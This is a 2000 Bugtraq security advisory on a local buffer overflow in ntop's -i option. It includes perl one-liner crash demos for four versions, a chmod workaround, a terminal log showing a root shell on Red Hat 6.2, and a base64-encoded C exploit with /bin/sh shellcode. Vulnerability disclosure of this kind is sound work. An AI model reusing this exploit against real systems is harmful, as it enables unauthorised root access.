Date: Tue, 24 Oct 2000 13:42:03 +0200 From: BAILLEUX Christophe <cb@GROLIER.FR> Subject: Security Advisory - ntop local buffer overflow vulnerability (fwd) To: BUGTRAQ@SECURITYFOCUS.COM This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --1975662025-4787889-972385715=:12507 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: <Pine.LNX.4.21.0010241330282.12507@tshaw.grolier.fr> Subject : ntop local buffer overflow vulnerability Author : Christophe BAILLEUX (cb@grolier.fr) Plateforms : *nix Test version : ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2 I. Problem All ntop versions are vulnerabled to local buffer overflow attack in there -i options. Ntop must be owned by root with a setuid bit for the attacker to gain root privileges. II. Demo a) ntop 1.1 tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'` ntop v.1.1 MT [i686-pc-linux-gnu] listening on AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Host Act -Rcvd- Sent TCP UDP ICMP Segmentation fault tshaw:/home/cb/SRCAUDIT/ntop-1.1$ b) ntop 1.2a7 tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'` Segmentation fault tshaw:/home/cb/SRCAUDIT/ntop-1.2a7$ c) ntop 1.3.1 tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'` Segmentation fault tshaw:/home/cb/SRCAUDIT/ntop-1.3.1$ d) ntop 1.3.2 tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'` 24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00 07:04:32 PM build) 24/Oct/2000:12:32:16 Listening on [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA] 24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <deri@ntop.org> 24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/ 24/Oct/2000:12:32:16 Initialising... Segmentation fault tshaw:/home/cb/ntop-1.3.2$ III. Workaround chmod ug-s path/to/ntop ntop team has been informed (http://www.ntop.org). IV. Exploit (See Attachment) Tested on redhat 6.2 (Zoot) where ntop is installed by default with the bit setuid root [cb@nux cb]$ cat /etc/redhat-release Red Hat Linux release 6.2 (Zoot) [cb@nux cb]$ rpm -qf /sbin/ntop ntop-1.1-1 [cb@nux cb]$ id uid=535(cb) gid=535(cb) groups=535(cb) [cb@nux cb]$ ./expl ntop v.1.1 MT [i586-pc-linux-gnu] listening on .............................. Host Act -Rcvd- Sent TCP UDP ICMP bash# bash# id uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb) bash# exit [cb@nux cb]$ Greetings to kalou, Bdev, cleb, dv, PullthePlug Community and all i forget. Thanks Teuk for leating me use his server, for do and test ntop redhat 6.2 exploit :) Regards, -- BAILLEUX Christophe - Network & System Security Engineer Grolier Interactive Europe-OG/CS Voice:+33-(0)1-5545-4789 - mailto:cb@grolier.fr --1975662025-4787889-972385715=:12507 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="ntop-1.1-1-ex.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.21.0010241308350.12507@tshaw.grolier.fr> Content-Description: Content-Disposition: ATTACHMENT; FILENAME="ntop-1.1-1-ex.c" I2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHN0cmluZy5oPg0KI2lu Y2x1ZGUgPHN0ZGlvLmg+DQoNCiNkZWZpbmUgTEVOIDIwOCANCg0KaW50IG1h aW4gKGludCBhcmdjLCBjaGFyICoqYXJndikNCnsNCiAgY2hhciBidWZbTEVO ICsgMTJdOw0KICBpbnQgIHJldCA9IDB4YmZmZmZiYTA7DQogIGludCAgKnA7 DQoNCiAgY2hhciBjb2RlW109DQogICAgICAiXHgzMVx4ZGJceGI4XHhiN1x4 YWFceGFhXHhhYVx4MjVceGI3XHg1NVx4NTVceDU1XHg1M1x4NTNceGNkXHg4 MCINCiAgICAgICJceDMxXHhkYlx4YjhceDE3XHhhYVx4YWFceGFhXHgyNVx4 MTdceDU1XHg1NVx4NTVceDUzXHg1M1x4Y2RceDgwIg0KICAgICAgIlx4ZWJc eDFmXHg1ZVx4ODlceDc2XHgwOFx4MzFceGMwXHg4OFx4NDZceDA3XHg4OVx4 NDZceDBjXHhiMFx4MGIiDQogICAgICAiXHg4OVx4ZjNceDhkXHg0ZVx4MDhc eDhkXHg1Nlx4MGNceGNkXHg4MFx4MzFceGRiXHg4OVx4ZDhceDQwXHhjZCIN CiAgICAgICJceDgwXHhlOFx4ZGNceGZmXHhmZlx4ZmYvYmluL3NoIjsNCg0K ICBpZiAoYXJnYyA+IDEpIHsNCiAgICByZXQgKz0gYXRvaShhcmd2WzFdKTsN CiAgICBmcHJpbnRmKHN0ZGVyciwgIlVzaW5nIHJldCAlIzAxMHhcbiIsIHJl dCk7DQogIH0NCg0KICBtZW1zZXQoYnVmLCAnXHg5MCcsIExFTik7DQogIG1l bWNweShidWYgKyBMRU4gLSBzdHJsZW4oY29kZSksIGNvZGUsIHN0cmxlbihj b2RlKSk7DQoNCiAgcCA9IChpbnQgKikgKGJ1ZiArIExFTik7DQoNCiAgKnAr KyA9IHJldDsNCiAgKnArKyA9IHJldDsNCiAgKnAgICA9IDA7DQoNCiBleGVj bCgiLi9udG9wIiwgIm50b3AiLCAiLWkiLCBidWYsIE5VTEwpOw0KDQp9DQo= --1975662025-4787889-972385715=:12507--